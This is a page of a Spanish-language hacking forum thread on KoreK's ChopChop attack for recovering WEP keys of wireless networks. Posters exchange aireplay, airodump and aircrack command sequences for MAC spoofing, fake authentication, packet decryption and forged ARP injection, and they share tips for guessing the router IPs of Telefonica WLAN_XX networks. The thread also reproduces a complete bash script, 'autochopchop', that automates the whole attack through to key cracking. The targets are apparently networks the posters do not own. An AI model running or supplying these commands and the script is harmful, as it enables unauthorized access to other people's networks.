elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
14 Octubre 2008, 01:33  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless (Moderadores: rh3nt0n, longits, pianista, *dudux, ChimoC)
| | |-+  Ataque ChopChop de KoreK. Por o2T7f6j2
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 [6] 7 Ir Abajo Imprimir
Autor Tema: Ataque ChopChop de KoreK. Por o2T7f6j2  (Leído 20058 veces)
pianista
ChopChoping...
Moderador
*****
Desconectado Desconectado

Mensajes: 5.083


Hacking Wireless Live!


Ver Perfil WWW
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #75 en: 12 Noviembre 2006, 23:36 »

Te lee paquetes y te dira que cual quieres enviar no?
Pues escoges el del que contiene el arp ( solo hay uno) que vendra con FromDs y veras como lo va enviando ;)
Saludos
En línea

*dudux
Moderador
*****
Desconectado Desconectado

Mensajes: 2.073


.....traficando con sueños.....


Ver Perfil
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #76 en: 12 Noviembre 2006, 23:42 »

lo puedes hacer con el A2 y el -r
o con el A1 y el A3 -r nueva.cap
En línea

Visita ....................    http://217.125.24.22/
Melans

Desconectado Desconectado

Mensajes: 375



Ver Perfil
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #77 en: 13 Noviembre 2006, 10:32 »

Hola:

asi q es cuestion de tiempo y parece q todos los pasos anterirores los he hecho bien.no?

luego pruebo.

saludos y gracias
En línea
*dudux
Moderador
*****
Desconectado Desconectado

Mensajes: 2.073


.....traficando con sueños.....


Ver Perfil
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #78 en: 13 Noviembre 2006, 12:21 »

te pasa lo mismo que a mi...lo hize bien todo...forje el ARP . me dio "Done" y no ize el A2..........solo te queda un paso....... ;)
En línea

Visita ....................    http://217.125.24.22/
alist3r

Desconectado Desconectado

Mensajes: 18

Desde Debian con amor


Ver Perfil
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #79 en: 27 Noviembre 2006, 18:30 »

Como veo que algunas cosillas no habian quedado muy claras, y que habia errores en los scripts bajo algunas situaciones, los trabjé un poco mas despues de postear aqui. Luego me olvidé de los pobres jaja.

Os pasteo un extracto de un email que envié a algunos de vosotros  en su dia, y la nueva version del script que esta en mi server:

ftp://alister.homelinux.net/pub/chopchop

Citar
Gente:

Os adjunto el script + instrucciones. Recuerda que mi script solo trabaja con tarjetas de chipset atheros (informate de cuales son)

pasos a seguir:

te bajas la troppix y la grabas a cd

metes en un pendrive el script adjunto (fichero autochopchop, sin extension)

para preparar el script y pasarlo a ram etc:

metes el cd de la troppix y arrancas con el pendrive pinchado.

luego, para preparar el script, abres un console y ¡a teclear!

    cd /mnt/sda1
    cp /mnt/sda1/autochopchop /usr/bin
    chmod 777 /usr/bin/autochopchop


NOTA: "sda1" puede variar en funcion del particionado de tu pendrive. investiga por tu cuenta como acceder a el.

luego:

    comandos para buscar redes al alcance:

    ifconfig ath0 up
    iwlist ath0 scan


o bien si ya no eres novato usa kismet y memoriza el essid.


    Comando para empezar el ataque:

    autochopchop nombredelawifi

    y seguir instrucciones en pantalla.


problemas mas graves que se le plantean a un novato:

- elegir el paquete a desencriptar, de las infinitas opciones que muestra aireplay

Cuando aparezca una oferta de aireplay mostrando un candidato de paquete que se pueda desencriptar, verificar que la MAC de origen del paquete cazado NO SEA 1:2:3:4:5 (esa sera nuestra mac falsa mientras usemos el script), el resto de criterios prácticamente nos valen todos, pero es preferible que la source mac y el bssid encajen (ese paquete seguramente procede directo del router wifi).

- elegir la ip de destino a la que enviar el arp forjado

como los routers de telefonica siempre son 192.168.1.1, 95% que aciertas con esa opcion. si la ip que hemos auditado con el paquete cazado es 192.168.1.33, tambien podemos elegir la ip de destino 192.168.1.1 porque tiene toda la pinta de que se trata de un router de telefonica con un cliente asignado por dhcp (la primera ip que da el servidor dhcp de los routers de telefonica es 192.168.1.33).

otra pista: en las redes de nombre WLAN_XX podeis elegir 192.168.1.1 a ciegas, que acertais fijo.

para cualquier cosa podeis consultarme por email pero mis tiempos de respuesta son algo elevados porque robotics no me deja tiempo para más :P

un saludo, nos vemos en la conferencia de hacking wireless de valencia jeje

Alex Amo
En línea

Debian rlz
*dudux
Moderador
*****
Desconectado Desconectado

Mensajes: 2.073


.....traficando con sueños.....


Ver Perfil
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #80 en: 27 Noviembre 2006, 20:10 »

no sabia que existia un script............... ;D ;D

de hecho lo voy a probar,........
En línea

Visita ....................    http://217.125.24.22/
rh3nt0n
Moderador
*****
Desconectado Desconectado

Mensajes: 1.990


carpe diem, quam minimun credula postero .


Ver Perfil
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #81 en: 28 Noviembre 2006, 13:04 »

Me parece un aporte estupendo , un script estupendamente bien explicado , y estructurado , gracias por el aporte alist3r .
saludos
En línea

La vida es breve y dos veces bella tres veces dura y cuatro te revienta cinco veces te adormece y otras de desvela una te equivocas y otra aciertas una entiendes y otra no entiendes una ***** y otra dan las seis y media la rueda sigue... ¡vaya dilema! ..."

[ojos de brujo]
Fenotipo

Desconectado Desconectado

Mensajes: 28


Ver Perfil
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #82 en: 04 Diciembre 2006, 23:35 »

Es bueno el script de tu ftp, alist3r.

Si que funciona una vez que tienes instalada la atheros en condiciones, el problema es que con algunos APs lo que ocurre es que dice asociarse con la MAC del fake-host que nos inventamos, pero en la ventana donde está currando el airodump no aparece tal MAC como estación asociada. Ni siquiera aun haciendo 'aireplay -1 ...' después de haberse asociado del modo de tu script. Y claro, el 'aireplay -4 ...' no consigue ni un solo paquete para preguntar si nos quedamos con él o no (captura solo beacons).
Repito que eso ocurre con algunos APs al parecer.
« Última modificación: 04 Diciembre 2006, 23:37 por Fenotipo » En línea
pianista
ChopChoping...
Moderador
*****
Desconectado Desconectado

Mensajes: 5.083


Hacking Wireless Live!


Ver Perfil WWW
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #83 en: 05 Diciembre 2006, 08:01 »

Muy buen script alist3r, espero que con este mucha gente se anime a hacer chopchop ;)
Saludoss
En línea

FUKER05

Desconectado Desconectado

Mensajes: 71


Ver Perfil
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #84 en: 15 Marzo 2007, 12:37 »

Una pregunta, para poder empezar a hacer:
aireplay -1 30 -e [ESSID] -a [MAC_AP] -h [MAC_INVENTADA] rausb0

es necesario haber capturado algun paquete de la red?
Esque en el ejemplo que pones ya tienes capturados 3 paquetes, pero a mi no me captura ninguno....

Saludos!!!
En línea
pianista
ChopChoping...
Moderador
*****
Desconectado Desconectado

Mensajes: 5.083


Hacking Wireless Live!


Ver Perfil WWW
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #85 en: 15 Marzo 2007, 15:50 »

Umm veras necesitas un paquete data que provenga del router para poder forjar el xor....
Lo que pasa que aunque este ataque se suele hacer sin clientes, hay vcees que se puede hacer el truco y funciona casi siempre de si hay clientes conectados y no te funciona el A3 le lanzas un chopchop y ya tienes arp...
Saludoss
En línea

FUKER05

Desconectado Desconectado

Mensajes: 71


Ver Perfil
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #86 en: 15 Marzo 2007, 19:54 »

Umm veras necesitas un paquete data que provenga del router para poder forjar el xor....
Lo que pasa que aunque este ataque se suele hacer sin clientes, hay vcees que se puede hacer el truco y funciona casi siempre de si hay clientes conectados y no te funciona el A3 le lanzas un chopchop y ya tienes arp...
Saludoss

No lo entiendo. Dices que con el chopchop no hace falta clientes y yo no lo veo asi. Te cuento mi experiencia:
Quiero conseguir la clave WEP de una red en la que en ese momento no hay clientes conectados (por lo tanto si hago un airodump aparece en DATA el valor de 0). Primero hago un A1 para conseguir una autentificacion falsa. Una vez que he hecho una autentificación y se me ha asociado permanentemente (mediante el velor 30) hago un A4 para desencriptar el paquete. El caso es que no me aparece ningun paquete de la AP de la que quiero conseguir la clave, solo únicamente consigo paquetes de los AP´s que estan teniendo tráfico, es decir que tienen clientes conectados.

Cuando me asocio con un AP, en el airodump deberia subir el número de DATA?? Porque si es asi, en mi caso no lo hace...

Pongo todos los pasos que hago hasta el A4 por si hay algo que este mal en mi ralink rt2500 para conseguir la clave de una red que está en el canal 3:

%Paso mi tarjeta a RT73 con modo monitor y pongo una MAC falsa
rtmodrt2570
rtmortd73
modprobe rt73
ifconfig rausb0 hw ether 00:11:22:33:44:55
ifconfig rausb0 up
iwconfig rausb0 rate 1M channel 3 mode monitor
% Capturo trafico con el Airodump
airodump rausb0 captura_chopchop.cap
% Abro una ventana nueva y hago la asociacion falsa
aireplay -1 30 -e "WLAN_05" -a 00:16:38:XX:XX:2B -h 00:11:22:33:44:55 rausb0
% Abro otra ventana y desencripto un paquete
aireplay -4 -h 00:11:22:33:44:55 rausb0


En esto ultimo me apareceran varios paquetes pero ninguno con  BSSID 00:16:38:XX:XX:2B (MAC de la AP a descifrar) ya que aun permanece el DATA a 0, por lo que no puedo dar a usar el paquete...

Lo he probado con otra red a la cual si que le llegan paquetes y si que me aparecen paquetes a desencriptar, aunque estoy teniendo problemas ya que el A4 va muy lento y a veces el A1 me dice que no ha podido asociarse...

¿Por qué no puedo acceder a ningun paquete de la WLAN_05 que quiero desencriptar si segun se comenta el CHOPCHOP es para redes que no tienen clientes en ese mismo momento??

Saludos y gracias!!!
En línea
pianista
ChopChoping...
Moderador
*****
Desconectado Desconectado

Mensajes: 5.083


Hacking Wireless Live!


Ver Perfil WWW
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #87 en: 15 Marzo 2007, 22:18 »

A ver, te he dicho que SI  necesitas clientes, lo que te digo es que a veces con el A1 no funciona porque no se escupe ningun data, o simplemente esta protegido, pero que si tienes una station de verdad que no es falsa y la estas haciendo A3 y no va, entonces pruebes chopchop sobre esa station... ;D
Saludoss
PD:Los pasos estan bien, lo que pasa es que muchas veces falla, pero si el cliente es autentico siempre funciona
En línea

onichan

Desconectado Desconectado

Mensajes: 30


Ver Perfil
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #88 en: 03 Abril 2007, 13:56 »

Wenas, alguien puede colgar el famoso script AUTOCHOPCHOP de Alist3r para atheros? Gracias de antemano.
En línea
*dudux
Moderador
*****
Desconectado Desconectado

Mensajes: 2.073


.....traficando con sueños.....


Ver Perfil
Re: Ataque ChopChop de KoreK. Por o2T7f6j2
« Respuesta #89 en: 03 Abril 2007, 14:51 »

tanto autochopchop como el airoscript suelen fallar mucho........y dejamos de aprender en cada momento lo qe hacemos


mira por donde que si que lo tengo.......................


Citar
#!/bin/bash
#
# Autochopchop lite v1.0
#
# Script para realizar ataques chopchop automaticos sobre redes inalámbricas WEP:
#
# * Mediante tarjetas WIFI con chipset atheros (p. ej. NETGEAR WG511T)
# * Usando el modo híbrido MANAGED/RAW de las mismas (driver parcheado a tal efecto)
#   para realizar una auntenticación VERDADERA en lugar de enviar constantemente una simulada.
#
# Autor: Alist3r
#
# Uso:
# autochopchop ESSID
#
# Donde ESSID es el nombre de la red que queremos descifrar.
#
# VARIABLES CONFIGURABLES:
# Pues eso. Variables configurables por el usuario.
#
# MIMAC: mac falsa que adoptara la tarjeta wifi para realizar el ataque.
mimac="00:11:22:33:44:55"
#
# ATH interfaz con la que vamos a trabajar (normalmente ath0)
ath=ath0
#
# OTRAS VARIABLES
# Normalmente no será necesario tocar estas variables.
#
# ATHRAW : esto lo asigna el kernel. Si por ejemplo nuestra interfaz es ath0
# la interfaz RAW asociada a nuestra tarjeta sera ath0raw.
#
athraw=$ath"raw"
#
# SPEED: Velocidad de inyeccion de paquetes por sec.. 600 es lo aconsejado.
speed="600"
#
# FAKEIP: IP falsa que vamos a usar como IP de origen de la que proviene
# el ARP forjado. No tiene mucha importancia cambiarla.
fakeip="1.2.3.4"
#
# ** INICIO DEL SCRIPT **
#
# Comprobamos que se nos ha pasado el ESSID de la red que queremos descifrar. En caso contrario, salir

if [ $# -eq 0 ]
 then
 echo "Numero de argumentos insuficientes"
 echo "Uso: $0 ESSID"
 exit
fi

# INICIALIZACION
# NOTA: Estos comandos de abajo van bien y no creo que deban tocarse mucho.

echo Iniciando dispositivos... $ath - $athraw

sysctl -w dev.$ath.rawdev=1
ifconfig $athraw up

ifconfig $ath down # por si acaso, antes de cambiar la mac
ifconfig $ath hw ether $mimac
iwpriv $ath mode 2
iwconfig $ath mode managed essid "$1" channel 0 key AAAAAAAAAA rate 1M ap off

ifconfig $athraw up
ifconfig $ath up
echo Intentando asociar a la red $1...
sleep 3

iwconfigdat=$(iwconfig $ath)

echo Comprobando asociacion...

# Sacamos datos: bssid de la red...
bssid=$(echo $iwconfigdat |  cut -d":" -f5,6,7,8,9,10 | cut -d " " -f2)

# Aprovechamos para parar si parece que no estamos asociados a ninguna red.

if [ $bssid == "00:00:00:00:00:00" ];
then
  echo No ha asociado a ningun AP.
  echo Comprueba el nombre de la red y la distancia e intentalo de nuevo.
  echo
  exit
fi

# Sacamos mas datos: canal...
channelfreq=$(echo $iwconfigdat | cut -d":" -f4 | cut -d" " -f1)
case $channelfreq in

2.412)
channel=1;;

2.417)
channel=2;;

2.422)
channel=3;;

2.427)
channel=4;;

2.432)
channel=5;;

2.437)
channel=6;;

2.442)
channel=7;;

2.447)
channel=8;;

2.452)
channel=9;;

2.457)
channel=10;;

2.462)
channel=11;;

esac

echo Asociado correctamente a $1
echo BSSID: $bssid canal $channel
sleep 1
echo Purgando archivos antiguos...
sleep 1

if [ -e replay_dec-*.cap ]; then rm replay_dec-*.cap; fi

if [ -e replay_dec-*.xor ]; then rm replay_dec-*.xor; fi

if [ -e vectores_debiles*.ivs ]; then rm vectores_debiles*.ivs; fi

if [ -e vectores_debiles*.txt ]; then rm vectores_debiles*.txt; fi

echo Iniciando ataque...
sleep 1

aireplay -4 -h $mimac -b $bssid $ath
status=$?

if [ $status != 0 ];
then
   echo Aireplay ha devuelto un status "$?"
        echo Detengo el script porque creo que el ataque chopchop ha fallado...
   echo Intentalo de nuevo.   
   exit
fi

# si aireplay no ha fallado analizaremos el fichero cap que ha generado para sacar ip's

tcpdump -s 0 -n -e -r $( ls replay_dec-*.cap )

echo ---------------------------------------------------------------
echo Arriba aparece informacion sobre el paquete cazado de la red.
echo en ella se veran una o dos direcciones ip validas para enviar ARP.
read -p "A que ip se va a enviar ARP?:" ipdest

# forjar el paquete arp que inyectaremos a la ip que diga el usuario
echo Forjando ARP para enviar a $ipdest...

arpforge $( ls replay_dec-*.xor ) 1 $bssid $mimac $fakeip $ipdest forged_arp.cap


echo Arp forjado. Responde "Y" a "USE THIS PACKET?" en la ventana emergente que aparecera a continuacion.
echo Pulsa enter para comenzar...
read

# Lanzar dos terminales, uno inyectando el arp; otro escuchando las respuestas del router

xterm -e airodump $ath vectores_debiles $channel 1 &

xterm -e aireplay -2 -r forged_arp.cap -x $speed $ath &

# Y al rato de inyectar empieza aircrack a procesar datos para decodificar la red...
echo Inyeccion en curso, preparando aircrack para descodificacion en 20 secs...
sleep 20
aircrack $( ls vectores_debiles*.ivs )



ya sabes lo copias y lo pegas en un archivo de texto........le pones extension .sh y le cambias permisos..............



se me olvidaba...........no es para atheros.........pero te puede valer

video del ataque chopchop con la ipw2200.......
http://mirror-wifislax.lost-away.org/videos/chopchopipw2.htm
« Última modificación: 03 Abril 2007, 19:36 por *dudux » En línea

Visita ....................    http://217.125.24.22/
Páginas: 1 2 3 4 5 [6] 7 Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC